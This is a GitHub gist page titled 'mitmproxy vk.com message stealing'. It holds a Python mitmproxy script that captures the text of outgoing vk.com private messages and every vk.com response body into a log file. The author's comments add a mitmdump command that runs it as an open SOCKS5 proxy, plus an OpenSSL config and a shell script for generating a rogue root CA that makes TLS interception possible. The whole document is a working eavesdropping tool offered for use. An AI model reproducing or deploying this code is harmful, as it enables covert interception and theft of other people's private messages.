Skip to content

Instantly share code, notes, and snippets.

@andyollylarkin

andyollylarkin/dump_vk_request.py

Last active October 1, 2024 20:28
Show Gist options
  • Save andyollylarkin/3bc0b497bb679a304b668bdd3118f0bc to your computer and use it in GitHub Desktop.
Save andyollylarkin/3bc0b497bb679a304b668bdd3118f0bc to your computer and use it in GitHub Desktop.
Download ZIP
mitmproxy vk.com message stealing
Raw
dump_vk_request.py
from mitmproxy import http
def request(flow: http.HTTPFlow) -> None:
if "messages.send" in flow.request.pretty_url:
with open("requests.log", "a") as log_file:
if flow.request.content:
if "application/x-www-form-urlencoded" in flow.request.headers.get("Content-Type", ""):
if flow.request.urlencoded_form['message']:
log_file.write("Данные формы (URL-encoded):\n")
log_file.write(f"{flow.request.urlencoded_form['message']}\n")
elif "multipart/form-data" in flow.request.headers.get("Content-Type", ""):
log_file.write("Данные формы (multipart):\n")
for key, value in flow.request.multipart_form.items():
if key == "message":
log_file.write(f"{key}: {value}\n")
else:
log_file.write(f"Тело запроса: {flow.request.text}\n")
log_file.write("\n")
def response(flow: http.HTTPFlow) -> None:
if "vk.com" in flow.request.host:
with open("requests.log", "a") as log_file:
if flow.response.content:
log_file.write(f"Тело ответа: {flow.response.text}\n")
log_file.write("\n")
@andyollylarkin
Copy link
Author

andyollylarkin commented Sep 30, 2024
edited
Loading

Запуск mitmproxy
Данная команда использует директорию /tmp для поиска собственного CA сертификата, который должен называться mitmproxy-ca.pem

mitmdump --listen-host 0.0.0.0  -k --set block_global=false -s /tmp/dumpvk.py  --mode socks5 --set confdir=/tmp

@andyollylarkin
Copy link
Author

Из документации

При просмотре сертификата openssl x509 -noout -text -in ~/.mitmproxy/mitmproxy-ca.pem он должен иметь как минимум следующие расширения X509v3, чтобы mitmproxy мог использовать его для генерации сертификатов:

X509v3 extensions:
X509v3 Key Usage: critical
Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE

@andyollylarkin
Copy link
Author

Конфиг для генерации

[ ca ]
default_ca = CA_default

[ CA_default ]
default_md        = sha256

[ req ]
prompt = no
default_bits       = 2048
distinguished_name = req_distinguished_name
x509_extensions    = v3_ca

[ req_distinguished_name ]
stateOrProvinceName    = US
localityName           = US
organizationName       = GSSIGN
organizationalUnitName = GSSIGN
commonName             = rootCA
emailAddress           = [email protected]

[ v3_ca ] # раздел для расширений
keyUsage = critical, cRLSign, keyCertSign, digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth, clientAuth, emailProtection, timeStamping
basicConstraints = critical, CA:TRUE

Скрипт для генерации:

        echo "Generate root CA key ...";
        openssl genpkey -algorithm RSA -out root.key -pkeyopt rsa_keygen_bits:2048;
        echo "Generate root CA certificate ...";
        openssl req -x509 -new -nodes -key ./root.key -sha256 -days $DAYS -out ./root.crt -passin pass:$2 -config ./root.cnf;
        cat ./root.key ./root.crt > ./full.pem;

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment